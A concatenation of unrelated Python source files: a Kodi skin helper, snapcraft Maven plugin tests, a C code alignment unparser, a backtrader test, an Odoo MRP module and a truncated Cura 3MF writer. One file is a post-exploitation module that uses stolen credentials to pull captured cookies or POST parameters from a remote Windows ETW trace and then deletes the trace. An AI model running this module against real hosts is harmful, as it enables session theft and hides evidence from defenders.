xbmcgui.Dialog().ok(heading=xbmc.getLocalizedString(16205),
line1=xbmc.getLocalizedString(32015))
def overlaytexture(self):
'''legacy: helper to let the user choose a background overlay from a skin defined folder'''
skinstring = self.params.get("skinstring", "BackgroundOverlayTexture")
self.params["skinstring"] = skinstring
self.params["resourceaddon"] = "resource.images.backgroundoverlays"
self.params["customfolder"] = "special://skin/extras/bgoverlays/"
self.params["allowmulti"] = "false"
self.params["header"] = self.addon.getLocalizedString(32002)
self.selectimage()
def busytexture(self):
'''legacy: helper which lets the user select a busy spinner from predefined spinners in the skin'''
skinstring = self.params.get("skinstring", "SkinHelper.SpinnerTexture")
self.params["skinstring"] = skinstring
self.params["resourceaddon"] = "resource.images.busyspinners"
self.params["customfolder"] = "special://skin/extras/busy_spinners/"
self.params["allowmulti"] = "true"
self.params["header"] = self.addon.getLocalizedString(32006)
self.selectimage()
def selectimage(self):
'''helper which lets the user select an image or imagepath from resourceaddons or custom path'''
skinsettings = SkinSettings()
skinstring = self.params.get("skinstring", "")
skinshortcutsprop = self.params.get("skinshortcutsproperty", "")
current_value = self.params.get("currentvalue", "")
resource_addon = self.params.get("resourceaddon", "")
allow_multi = self.params.get("allowmulti", "false") == "true"
windowheader = self.params.get("header", "")
skinhelper_backgrounds = self.params.get("skinhelperbackgrounds", "false") == "true"
label, value = skinsettings.select_image(
skinstring, allow_multi=allow_multi, windowheader=windowheader, resource_addon=resource_addon,
skinhelper_backgrounds=skinhelper_backgrounds, current_value=current_value)
if label:
if skinshortcutsprop:
# write value to skinshortcuts prop
from skinshortcuts import set_skinshortcuts_property
set_skinshortcuts_property(skinshortcutsprop, value, label)
else:
# write the values to skin strings
if value.startswith("$INFO"):
# we got an dynamic image from window property
skinsettings.set_skin_variable(skinstring, value)
value = "$VAR[%s]" % skinstring
skinstring = skinstring.encode("utf-8")
label = label.encode("utf-8")
xbmc.executebuiltin("Skin.SetString(%s.label,%s)" % (skinstring, label))
xbmc.executebuiltin("Skin.SetString(%s.name,%s)" % (skinstring, label))
xbmc.executebuiltin("Skin.SetString(%s,%s)" % (skinstring, value))
xbmc.executebuiltin("Skin.SetString(%s.path,%s)" % (skinstring, value))
del skinsettings
def dialogok(self):
'''helper to show an OK dialog with a message'''
headertxt = self.params.get("header")
bodytxt = self.params.get("message")
if bodytxt.startswith(" "):
bodytxt = bodytxt[1:]
if headertxt.startswith(" "):
headertxt = headertxt[1:]
dialog = xbmcgui.Dialog()
dialog.ok(heading=headertxt, line1=bodytxt)
del dialog
def dialogyesno(self):
'''helper to show a YES/NO dialog with a message'''
headertxt = self.params.get("header")
bodytxt = self.params.get("message")
yesactions = self.params.get("yesaction", "").split("|")
noactions = self.params.get("noaction", "").split("|")
if bodytxt.startswith(" "):
bodytxt = bodytxt[1:]
if headertxt.startswith(" "):
headertxt = headertxt[1:]
if xbmcgui.Dialog().yesno(heading=headertxt, line1=bodytxt):
for action in yesactions:
xbmc.executebuiltin(action.encode("utf-8"))
else:
for action in noactions:
xbmc.executebuiltin(action.encode("utf-8"))
def textviewer(self):
'''helper to show a textviewer dialog with a message'''
headertxt = self.params.get("header", "")
bodytxt = self.params.get("message", "")
if bodytxt.startswith(" "):
bodytxt = bodytxt[1:]
if headertxt.startswith(" "):
headertxt = headertxt[1:]
xbmcgui.Dialog().textviewer(headertxt, bodytxt)
def fileexists(self):
'''helper to let the skinner check if a file exists
and write the outcome to a window prop or skinstring'''
filename = self.params.get("file")
skinstring = self.params.get("skinstring")
windowprop = self.params.get("winprop")
if xbmcvfs.exists(filename):
if windowprop:
self.win.setProperty(windowprop, "exists")
if skinstring:
xbmc.executebuiltin("Skin.SetString(%s,exists)" % skinstring)
else:
if windowprop:
self.win.clearProperty(windowprop)
if skinstring:
xbmc.executebuiltin("Skin.Reset(%s)" % skinstring)
def stripstring(self):
'''helper to allow the skinner to strip a string and write results to a skin string'''
splitchar = self.params.get("splitchar")
if splitchar.upper() == "[SPACE]":
splitchar = " "
skinstring = self.params.get("string")
if not skinstring:
skinstring = self.params.get("skinstring")
output = self.params.get("output")
index = self.params.get("index", 0)
skinstring = skinstring.split(splitchar)[int(index)]
self.win.setProperty(output, skinstring)
def getfilename(self, filename=""):
'''helper to display a sanitized filename in the vidoeinfo dialog'''
output = self.params.get("output")
if not filename:
filename = xbmc.getInfoLabel("ListItem.FileNameAndPath")
if not filename:
filename = xbmc.getInfoLabel("ListItem.FileName")
if "filename=" in filename:
url_params = dict(urlparse.parse_qsl(filename))
filename = url_params.get("filename")
self.win.setProperty(output, filename)
def getplayerfilename(self):
'''helper to parse the filename from a plugin (e.g. emby) filename'''
filename = xbmc.getInfoLabel("Player.FileNameAndPath")
if not filename:
filename = xbmc.getInfoLabel("Player.FileName")
self.getfilename(filename)
def getpercentage(self):
'''helper to calculate the percentage of 2 numbers and write results to a skinstring'''
total = int(params.get("total"))
count = int(params.get("count"))
roundsteps = self.params.get("roundsteps")
skinstring = self.params.get("skinstring")
percentage = int(round((1.0 * count / total) * 100))
if roundsteps:
roundsteps = int(roundsteps)
percentage = percentage + (roundsteps - percentage) % roundsteps
xbmc.executebuiltin("Skin.SetString(%s,%s)" % (skinstring, percentage))
def setresourceaddon(self):
'''helper to let the user choose a resource addon and set that as skin string'''
from resourceaddons import setresourceaddon
addontype = self.params.get("addontype", "")
skinstring = self.params.get("skinstring", "")
setresourceaddon(addontype, skinstring)
def checkresourceaddons(self):
'''allow the skinner to perform a basic check if some required resource addons are available'''
from resourceaddons import checkresourceaddons
addonslist = self.params.get("addonslist", [])
if addonslist:
addonslist = addonslist.split("|")
checkresourceaddons(addonslist)
|
import io
import os
from unittest import mock
from xml.etree import ElementTree
import fixtures
from testtools.matchers import HasLength
import snapcraft
from snapcraft import tests
from snapcraft.plugins import maven
class MavenPluginTestCase(tests.TestCase):
def setUp(self):
super().setUp()
class Options:
maven_options = []
maven_targets = ['']
self.options = Options()
self.project_options = snapcraft.ProjectOptions()
patcher = mock.patch('snapcraft.repo.Ubuntu')
self.ubuntu_mock = patcher.start()
self.addCleanup(patcher.stop)
@staticmethod
def _canonicalize_settings(settings):
with io.StringIO(settings) as f:
tree = ElementTree.parse(f)
for element in tree.iter():
if element.text is not None and element.text.isspace():
element.text = None
if element.tail is not None and element.tail.isspace():
element.tail = None
with io.StringIO() as f:
tree.write(
f, encoding='unicode',
default_namespace='http://maven.apache.org/SETTINGS/1.0.0')
return f.getvalue() + '\n'
def test_get_build_properties(self):
expected_build_properties = ['maven-options', 'maven-targets']
resulting_build_properties = maven.MavenPlugin.get_build_properties()
self.assertThat(resulting_build_properties,
HasLength(len(expected_build_properties)))
for property in expected_build_properties:
self.assertIn(property, resulting_build_properties)
def assertSettingsEqual(self, expected, observed):
print(repr(self._canonicalize_settings(expected)))
print(repr(self._canonicalize_settings(observed)))
self.assertEqual(
self._canonicalize_settings(expected),
self._canonicalize_settings(observed))
def test_schema(self):
schema = maven.MavenPlugin.schema()
properties = schema['properties']
self.assertTrue('maven-options' in properties,
'Expected "maven-options" to be included in '
'properties')
maven_options = properties['maven-options']
self.assertTrue(
'type' in maven_options,
'Expected "type" to be included in "maven-options"')
self.assertEqual(maven_options['type'], 'array',
'Expected "maven-options" "type" to be "array", but '
'it was "{}"'.format(maven_options['type']))
self.assertTrue(
'minitems' in maven_options,
'Expected "minitems" to be included in "maven-options"')
self.assertEqual(maven_options['minitems'], 1,
'Expected "maven-options" "minitems" to be 1, but '
'it was "{}"'.format(maven_options['minitems']))
self.assertTrue(
'uniqueItems' in maven_options,
'Expected "uniqueItems" to be included in "maven-options"')
self.assertTrue(
maven_options['uniqueItems'],
'Expected "maven-options" "uniqueItems" to be "True"')
maven_targets = properties['maven-targets']
self.assertTrue(
'type' in maven_targets,
'Expected "type" to be included in "maven-targets"')
self.assertEqual(maven_targets['type'], 'array',
'Expected "maven-targets" "type" to be "array", but '
'it was "{}"'.format(maven_targets['type']))
self.assertTrue(
'minitems' in maven_targets,
'Expected "minitems" to be included in "maven-targets"')
self.assertEqual(maven_targets['minitems'], 1,
'Expected "maven-targets" "minitems" to be 1, but '
'it was "{}"'.format(maven_targets['minitems']))
self.assertTrue(
'uniqueItems' in maven_targets,
'Expected "uniqueItems" to be included in "maven-targets"')
self.assertTrue(
maven_targets['uniqueItems'],
'Expected "maven-targets" "uniqueItems" to be "True"')
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build(self, run_mock):
env_vars = (
('http_proxy', None),
('https_proxy', None),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
plugin = maven.MavenPlugin('test-part', self.options,
self.project_options)
def side(l):
os.makedirs(os.path.join(plugin.builddir, 'target'))
open(os.path.join(plugin.builddir,
'target', 'dummy.jar'), 'w').close()
run_mock.side_effect = side
os.makedirs(plugin.sourcedir)
plugin.build()
run_mock.assert_has_calls([
mock.call(['mvn', 'package']),
])
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build_fail(self, run_mock):
env_vars = (
('http_proxy', None),
('https_proxy', None),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
plugin = maven.MavenPlugin('test-part', self.options,
self.project_options)
os.makedirs(plugin.sourcedir)
self.assertRaises(RuntimeError, plugin.build)
run_mock.assert_has_calls([
mock.call(['mvn', 'package']),
])
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build_war(self, run_mock):
env_vars = (
('http_proxy', None),
('https_proxy', None),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
plugin = maven.MavenPlugin('test-part', self.options,
self.project_options)
def side(l):
os.makedirs(os.path.join(plugin.builddir, 'target'))
open(os.path.join(plugin.builddir,
'target', 'dummy.war'), 'w').close()
run_mock.side_effect = side
os.makedirs(plugin.sourcedir)
plugin.build()
run_mock.assert_has_calls([
mock.call(['mvn', 'package']),
])
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build_with_targets(self, run_mock):
env_vars = (
('http_proxy', None),
('https_proxy', None),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
opts = self.options
opts.maven_targets = ['child1', 'child2']
plugin = maven.MavenPlugin('test-part', opts,
self.project_options)
def side(l):
os.makedirs(os.path.join(plugin.builddir,
'child1', 'target'))
os.makedirs(os.path.join(plugin.builddir,
'child2', 'target'))
open(os.path.join(plugin.builddir,
'child1', 'target', 'child1.jar'), 'w').close()
open(os.path.join(plugin.builddir,
'child2', 'target', 'child2.jar'), 'w').close()
run_mock.side_effect = side
os.makedirs(plugin.sourcedir)
plugin.build()
run_mock.assert_has_calls([
mock.call(['mvn', 'package']),
])
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build_with_http_proxy(self, run_mock):
env_vars = (
('http_proxy', 'http://localhost:3132'),
('https_proxy', None),
('no_proxy', None),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
plugin = maven.MavenPlugin('test-part', self.options,
self.project_options)
def side(l):
os.makedirs(os.path.join(plugin.builddir, 'target'))
open(os.path.join(plugin.builddir,
'target', 'dummy.jar'), 'w').close()
run_mock.side_effect = side
settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml')
os.makedirs(plugin.sourcedir)
plugin.build()
run_mock.assert_has_calls([
mock.call(['mvn', 'package', '-s', settings_path]),
])
self.assertTrue(
os.path.exists(settings_path),
'expected {!r} to exist'.format(settings_path))
with open(settings_path) as f:
settings_contents = f.read()
expected_contents = (
'<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n'
' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n'
' xsi:schemaLocation="http://maven.apache.org/SETTINGS/'
'1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n'
' <interactiveMode>false</interactiveMode>\n'
' <proxies>\n'
' <proxy>\n'
' <id>http_proxy</id>\n'
' <active>true</active>\n'
' <protocol>http</protocol>\n'
' <host>localhost</host>\n'
' <port>3132</port>\n'
' <nonProxyHosts>localhost</nonProxyHosts>\n'
' </proxy>\n'
' </proxies>\n'
'</settings>\n')
self.assertSettingsEqual(expected_contents, settings_contents)
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build_with_http_proxy_and_no_proxy(self, run_mock):
env_vars = (
('http_proxy', 'http://localhost:3132'),
('https_proxy', None),
('no_proxy', 'internal'),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
plugin = maven.MavenPlugin('test-part', self.options,
self.project_options)
def side(l):
os.makedirs(os.path.join(plugin.builddir, 'target'))
open(os.path.join(plugin.builddir,
'target', 'dummy.jar'), 'w').close()
run_mock.side_effect = side
settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml')
os.makedirs(plugin.sourcedir)
plugin.build()
run_mock.assert_has_calls([
mock.call(['mvn', 'package', '-s', settings_path]),
])
self.assertTrue(
os.path.exists(settings_path),
'expected {!r} to exist'.format(settings_path))
with open(settings_path) as f:
settings_contents = f.read()
expected_contents = (
'<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n'
' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n'
' xsi:schemaLocation="http://maven.apache.org/SETTINGS/'
'1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n'
' <interactiveMode>false</interactiveMode>\n'
' <proxies>\n'
' <proxy>\n'
' <id>http_proxy</id>\n'
' <active>true</active>\n'
' <protocol>http</protocol>\n'
' <host>localhost</host>\n'
' <port>3132</port>\n'
' <nonProxyHosts>internal</nonProxyHosts>\n'
' </proxy>\n'
' </proxies>\n'
'</settings>\n')
self.assertSettingsEqual(expected_contents, settings_contents)
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build_with_http_proxy_and_no_proxies(self, run_mock):
env_vars = (
('http_proxy', 'http://localhost:3132'),
('https_proxy', None),
('no_proxy', 'internal, pseudo-dmz'),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
plugin = maven.MavenPlugin('test-part', self.options,
self.project_options)
def side(l):
os.makedirs(os.path.join(plugin.builddir, 'target'))
open(os.path.join(plugin.builddir,
'target', 'dummy.jar'), 'w').close()
run_mock.side_effect = side
settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml')
os.makedirs(plugin.sourcedir)
plugin.build()
run_mock.assert_has_calls([
mock.call(['mvn', 'package', '-s', settings_path]),
])
self.assertTrue(
os.path.exists(settings_path),
'expected {!r} to exist'.format(settings_path))
with open(settings_path) as f:
settings_contents = f.read()
expected_contents = (
'<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n'
' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n'
' xsi:schemaLocation="http://maven.apache.org/SETTINGS/'
'1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n'
' <interactiveMode>false</interactiveMode>\n'
' <proxies>\n'
' <proxy>\n'
' <id>http_proxy</id>\n'
' <active>true</active>\n'
' <protocol>http</protocol>\n'
' <host>localhost</host>\n'
' <port>3132</port>\n'
' <nonProxyHosts>internal|pseudo-dmz</nonProxyHosts>\n'
' </proxy>\n'
' </proxies>\n'
'</settings>\n')
self.assertSettingsEqual(expected_contents, settings_contents)
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build_with_http_and_https_proxy(self, run_mock):
env_vars = (
('http_proxy', 'http://localhost:3132'),
('https_proxy', 'http://localhost:3133'),
('no_proxy', None),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
plugin = maven.MavenPlugin('test-part', self.options,
self.project_options)
def side(l):
os.makedirs(os.path.join(plugin.builddir, 'target'))
open(os.path.join(plugin.builddir,
'target', 'dummy.jar'), 'w').close()
run_mock.side_effect = side
settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml')
os.makedirs(plugin.sourcedir)
plugin.build()
run_mock.assert_has_calls([
mock.call(['mvn', 'package', '-s', settings_path]),
])
self.assertTrue(
os.path.exists(settings_path),
'expected {!r} to exist'.format(settings_path))
with open(settings_path) as f:
settings_contents = f.read()
expected_contents = (
'<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n'
' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n'
' xsi:schemaLocation="http://maven.apache.org/SETTINGS/'
'1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n'
' <interactiveMode>false</interactiveMode>\n'
' <proxies>\n'
' <proxy>\n'
' <id>http_proxy</id>\n'
' <active>true</active>\n'
' <protocol>http</protocol>\n'
' <host>localhost</host>\n'
' <port>3132</port>\n'
' <nonProxyHosts>localhost</nonProxyHosts>\n'
' </proxy>\n'
' <proxy>\n'
' <id>https_proxy</id>\n'
' <active>true</active>\n'
' <protocol>https</protocol>\n'
' <host>localhost</host>\n'
' <port>3133</port>\n'
' <nonProxyHosts>localhost</nonProxyHosts>\n'
' </proxy>\n'
' </proxies>\n'
'</settings>\n')
self.assertSettingsEqual(expected_contents, settings_contents)
@mock.patch.object(maven.MavenPlugin, 'run')
def test_build_with_authenticated_proxies(self, run_mock):
env_vars = (
('http_proxy', 'http://user1:pass1@localhost:3132'),
('https_proxy', 'http://user2:pass2@localhost:3133'),
('no_proxy', None),
)
for v in env_vars:
self.useFixture(fixtures.EnvironmentVariable(v[0], v[1]))
plugin = maven.MavenPlugin('test-part', self.options,
self.project_options)
def side(l):
os.makedirs(os.path.join(plugin.builddir, 'target'))
open(os.path.join(plugin.builddir,
'target', 'dummy.jar'), 'w').close()
run_mock.side_effect = side
settings_path = os.path.join(plugin.partdir, 'm2', 'settings.xml')
os.makedirs(plugin.sourcedir)
plugin.build()
run_mock.assert_has_calls([
mock.call(['mvn', 'package', '-s', settings_path]),
])
self.assertTrue(
os.path.exists(settings_path),
'expected {!r} to exist'.format(settings_path))
with open(settings_path) as f:
settings_contents = f.read()
expected_contents = (
'<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"\n'
' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\n'
' xsi:schemaLocation="http://maven.apache.org/SETTINGS/'
'1.0.0 http://maven.apache.org/xsd/settings-1.0.0.xsd">\n'
' <interactiveMode>false</interactiveMode>\n'
' <proxies>\n'
' <proxy>\n'
' <id>http_proxy</id>\n'
' <active>true</active>\n'
' <protocol>http</protocol>\n'
' <host>localhost</host>\n'
' <port>3132</port>\n'
' <username>user1</username>\n'
' <password>pass1</password>\n'
' <nonProxyHosts>localhost</nonProxyHosts>\n'
' </proxy>\n'
' <proxy>\n'
' <id>https_proxy</id>\n'
' <active>true</active>\n'
' <protocol>https</protocol>\n'
' <host>localhost</host>\n'
' <port>3133</port>\n'
' <username>user2</username>\n'
' <password>pass2</password>\n'
' <nonProxyHosts>localhost</nonProxyHosts>\n'
' </proxy>\n'
' </proxies>\n'
'</settings>\n')
self.assertSettingsEqual(expected_contents, settings_contents)
|
import sys
def unparseToC(vars, annot_body_code, indent, extra_indent):
'''Unparse to C/C++ code'''
if len(vars) == 0:
return annot_body_code
s = '\n'
s += indent + '#pragma disjoint ('
for i, v in enumerate(vars):
if i > 0:
s += ', '
s += '*' + __printAddressC(v.var_name, v.dimensions)
s += ') \n'
s += indent + 'if ((('
for i, v in enumerate(vars):
if i > 0:
s += '|'
s += '(int)(' + __printAddressC(v.var_name, v.dimensions) + ')'
s += ') & 0xF) == 0) {\n'
for v in vars:
s += indent + extra_indent
s += '__alignx(16,' + __printAddressC(v.var_name, v.dimensions) + ');\n'
s += annot_body_code.replace('\n', '\n' + extra_indent)
s += '\n'
s += indent + '} else {\n'
s += annot_body_code.replace('\n', '\n' + extra_indent)
s += '\n'
s += indent + '}\n'
s += indent
return s
def unparseToFortran(vars, annot_body_code, indent, extra_indent):
'''Unparse to Fortran code'''
print 'error: Fortran is not yet supported in alignment module'
sys.exit(1)
def __printAddressC(var_name, dimensions):
'''Return the starting address location of the given variable (in C/C++)'''
dimensions = dimensions[:]
dimensions.remove(None)
s = str(var_name)
if len(dimensions) > 0:
s += '['
s += ']['.join(map(str, dimensions))
s += ']'
return s
def __printAddressFortran(var_name, dimensions):
'''Return the starting address location of the given variable (in Fortran)'''
dimensions = dimensions[:]
dimensions.remove(None)
s = str(var_name)
if len(dimensions) > 0:
s += '('
s += ','.join(map(str, dimensions))
s += ')'
return s
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import testcommon
import backtrader as bt
import backtrader.indicators as btind
chkdatas = 1
chkvals = [
['4076.212366', '3655.193634', '3576.228000'],
['4178.117675', '3746.573475', '3665.633700'],
['3974.307056', '3563.813794', '3486.822300'],
]
chkmin = 30
chkind = btind.WMAEnvelope
def test_run(main=False):
datas = [testcommon.getdata(i) for i in range(chkdatas)]
testcommon.runtest(datas,
testcommon.TestStrategy,
main=main,
plot=main,
chkind=chkind,
chkmin=chkmin,
chkvals=chkvals)
if __name__ == '__main__':
test_run(main=True)
|
"""
Parses the results found for the ETW started on a machine,
downloads the results and stops the ETW.
All credit to pauldotcom-
http://pauldotcom.com/2012/07/post-exploitation-recon-with-e.html
Module built by @harmj0y
"""
import settings
from lib import command_methods
from lib import helpers
from lib import smb
class Module:
def __init__(self, targets=None, creds=None, args=None):
self.name = "ETW Data Download"
self.description = "Download data results from ETW and clean everything up."
# internal list() that holds one or more targets
self.targets = targets
# internal list() that holds one or more cred tuples
# [ (username, pw), (username2, pw2), ...]
self.creds = creds
# a state output file that will be written out by pillage.py
# ex- if you're querying domain users
self.output = ""
# user interaction for- format is {Option : [Value, Description]]}
self.required_options = { "trigger_method" : ["wmis", "[wmis] or [winexe] for triggering"],
"flag" : ["cookies", "search for [cookies] or [post] parameters"]}
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
flag = self.required_options["flag"][0]
for target in self.targets:
# stop the ETW
stopCMD = "logman stop Status32 -ets"
command_methods.executeCommand(target, username, password, stopCMD, triggerMethod)
# search for cookies or POST paramters
if flag.lower() == "post":
flag = "POST"
moduleFile = "post_params.txt"
else:
flag = "cookie added"
moduleFile = "cookies.txt"
# check the ETW results for the specified flag, and delete the dump file
parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \""+flag+"\""
# wait 20 seconds for everything to parse...if errors happen, increase this
parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20)
# delete the trace file
delCmd = "del C:\\Windows\\Temp\\status32.etl"
command_methods.executeCommand(target, username, password, delCmd, triggerMethod)
if parseResult == "":
self.output += "[!] No ETW results for "+flag+" using creds '"+username+":"+password+"' on : " + target + "\n"
else:
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult)
self.output += "[*] ETW results for "+flag+" using creds '"+username+":"+password+"' on " + target + " stored at "+saveFile+"\n"
|
from openerp import models, fields, api, _
import math
class MrpBom(models.Model):
_inherit = 'mrp.bom'
@api.model
def _bom_explode(self, bom, product, factor, properties=None, level=0,
routing_id=False, previous_products=None,
master_bom=None):
routing_id = bom.routing_id.id or routing_id
result, result2 = super(MrpBom, self)._bom_explode(
bom, product, factor, properties=properties, level=level,
routing_id=routing_id, previous_products=previous_products,
master_bom=master_bom)
result2 = self._get_workorder_operations(
result2, factor=factor, level=level, routing_id=routing_id)
return result, result2
def _get_routing_line_from_workorder(self, routing_id, seq, workcenter_id,
wo_name):
""" Returns first routing line from a given data if found
@param routing_id: Routing id
@param seq: workorder sequence
@param workcenter_id: Workcenter id
@return: wo_name = Workorder name
"""
routing_line_obj = self.env['mrp.routing.workcenter']
domain = [('routing_id', '=', routing_id), ('sequence', '=', seq),
('workcenter_id', '=', workcenter_id)]
routing_lines = routing_line_obj.search(domain)
for rl in routing_lines:
if rl.name in wo_name:
return rl
return routing_line_obj
def _get_workorder_operations(self, result2, factor, level=0,
routing_id=False):
for work_order in result2:
if (work_order['sequence'] < level or
work_order.get('routing_wc_line')):
continue
seq = work_order['sequence'] - level
rl = self._get_routing_line_from_workorder(
routing_id, seq, work_order['workcenter_id'],
work_order['name'])
cycle = rl.cycle_nbr and int(math.ceil(factor / rl.cycle_nbr)) or 0
hour = rl.hour_nbr * cycle
default_wc_line = rl.op_wc_lines.filtered(lambda r: r.default)
work_order['cycle'] = cycle
work_order['hour'] = hour
work_order['time_start'] = default_wc_line.time_start or 0.0
work_order['time_stop'] = default_wc_line.time_stop or 0.0
work_order['routing_wc_line'] = rl.id
work_order['do_production'] = rl.do_production
return result2
@api.multi
@api.onchange('routing_id')
def onchange_routing_id(self):
for line in self.bom_line_ids:
line.operation = (self.routing_id.workcenter_lines and
self.routing_id.workcenter_lines[0])
if self.routing_id:
return {'warning': {
'title': _('Changing Routing'),
'message': _("Changing routing will cause to change the"
" operation in which each component will be"
" consumed, by default it is set the first"
" one of the routing")
}}
return {}
class MrpBomLine(models.Model):
_inherit = 'mrp.bom.line'
operation = fields.Many2one(
comodel_name='mrp.routing.workcenter', string='Consumed in')
|
from UM.Mesh.MeshWriter import MeshWriter
from UM.Math.Vector import Vector
from UM.Logger import Logger
from UM.Math.Matrix import Matrix
from UM.Application import Application
import UM.Scene.SceneNode
import Savitar
import numpy
MYPY = False
try:
if not MYPY:
import xml.etree.cElementTree as ET
except ImportError:
Logger.log("w", "Unable to load cElementTree, switching to slower version")
import xml.etree.ElementTree as ET
import zipfile
import UM.Application
class ThreeMFWriter(MeshWriter):
def __init__(self):
super().__init__()
self._namespaces = {
"3mf": "http://schemas.microsoft.com/3dmanufacturing/core/2015/02",
"content-types": "http://schemas.openxmlformats.org/package/2006/content-types",
"relationships": "http://schemas.openxmlformats.org/package/2006/relationships",
"cura": "http://software.ultimaker.com/xml/cura/3mf/2015/10"
}
self._unit_matrix_string = self._convertMatrixToString(Matrix())
self._archive = None
self._store_archive = False
def _convertMatrixToString(self, matrix):
result = ""
result += str(matrix._data[0, 0]) + " "
result += str(matrix._data[1, 0]) + " "
result += str(matrix._data[2, 0]) + " "
result += str(matrix._data[0, 1]) + " "
result += str(matrix._data[1, 1]) + " "
result += str(matrix._data[2, 1]) + " "
result += str(matrix._data[0, 2]) + " "
result += str(matrix._data[1, 2]) + " "
result += str(matrix._data[2, 2]) + " "
result += str(matrix._data[0, 3]) + " "
result += str(matrix._data[1, 3]) + " "
result += str(matrix._data[2, 3])
return result
## Should we store the archive
# Note that if this is true, the archive will not be closed.
# The object that set this parameter is then responsible for closing it correctly!
def setStoreArchive(self, store_archive):
self._store_archive = store_archive
## Convenience function that converts an Uranium SceneNode object to a SavitarSceneNode
# \returns Uranium Scenen node.
def _convertUMNodeToSavitarNode(self, um_node, transformation = Matrix()):
if type(um_node) is not UM.Scene.SceneNode.SceneNode:
return None
savitar_node = Savitar.SceneNode()
node_matrix = um_node.getLocalTransformation()
matrix_string = self._convertMatrixToString(node_matrix.preMultiply(transformation))
savitar_node.setTransformation(matrix_string)
mesh_data = um_node.getMeshData()
if mesh_data is not None:
savitar_node.getMeshData().setVerticesFromBytes(mesh_data.getVerticesAsByteArray())
indices_array = mesh_data.getIndicesAsByteArray()
if indices_array is not None:
savitar_node.getMeshData().setFacesFromBytes(indices_array)
else:
savitar_node.getMeshData().setFacesFromBytes(numpy.arange(mesh_data.getVertices().size / 3, dtype=numpy.int32).tostring())
# Handle per object settings (if any)
stack = um_node.callDecoration("getStack")
if stack is not None:
changed_setting_keys = set(stack.getTop().getAllKeys())
# Ensure that we save the extruder used for this object.
if stack.getProperty("machine_extruder_count", "value") > 1:
changed_setting_keys.add("extruder_nr")
# Get values for all changed settings & save them.
for key in changed_setting_keys:
savitar_node.setSetting(key, str(stack.getProperty(key, "value")))
for child_node in um_node.getChildren():
savitar_child_node = self._convertUMNodeToSavitarNode(child_node)
if savitar_child_node is not None:
savitar_node.addChild(savitar_child_node)
return savitar_node
def getArchive(self):
return self._archive
def write(self, stream, nodes, mode = MeshWriter.OutputMode.BinaryMode):
self._archive = None # Reset archive
archive = zipfile.ZipFile(stream, "w", compression = zipfile.ZIP_DEFLATED)
try:
model_file = zipfile.ZipInfo("3D/3dmodel.model")
# Because zipfile is stupid and ignores archive-level compression settings when writing with ZipInfo.
model_file.compress_type = zipfile.ZIP_DEFLATED
# Create content types file
content_types_file = zipfile.ZipInfo("[Content_Types].xml")
content_types_file.compress_type = zipfile.ZIP_DEFLATED
content_types = ET.Element("Types", xmlns = self._namespaces["content-types"])
rels_type = ET.SubElement(content_types, "Default", Extension = "rels", ContentType = "application/vnd.openxmlformats-package.relationships+xml")
model_type = ET.SubElement(content_types, "Default", Extension = "model", ContentType = "application/vnd.ms-package.3dmanufacturing-3dmodel+xml")
# Create _rels/.rels file
relations_file = zipfile.ZipInfo("_rels/.rels")
relations_file.compress_type = zipfile.ZIP_DEFLATED
relations_element = ET.Element("Relationships", xmlns = self._namespaces["relationships"])
model_relation_element = ET.SubElement(relations_element, "Relationship", Target = "/3D/3dmodel.model", Id = "rel0", Type = "http://schemas.microsoft.com/3dmanufacturing/2013/01/3dmodel")
savitar_scene = Savitar.Scene()
transformation_matrix = Matrix()
transformation_matrix._data[1, 1] = 0
transformation_matrix._data[1, 2] = -1
transformation_matrix._data[2, 1] = 1
transformation_matrix._data[2, 2] = 0
global_container_stack = Application.getInstance().getGlobalContainerStack()
# Second step: 3MF defines the left corner of the machine as center, whereas cura uses the center of the
# build volume.
if global_container_stack:
translation_vector = Vector(x=global_container_stack.getProperty("machine_width", "value") / 2,
y=global_container_stack.getProperty("machine_depth", "value") / 2,
z=0)
translation_matrix = Matrix()
translation_matrix.setByTranslation(translation_vector)
transformation_matrix.preMultiply(translation_matrix)
root_node = UM.Application.Application.getInstance().getController().getScene().getRoot()
for node in nodes:
if node == root_node:
for root_child in node.getChildren():
